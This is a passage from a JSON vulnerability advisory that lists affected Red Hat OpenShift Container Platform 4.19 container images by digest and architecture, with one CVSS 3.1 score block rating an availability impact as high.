"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
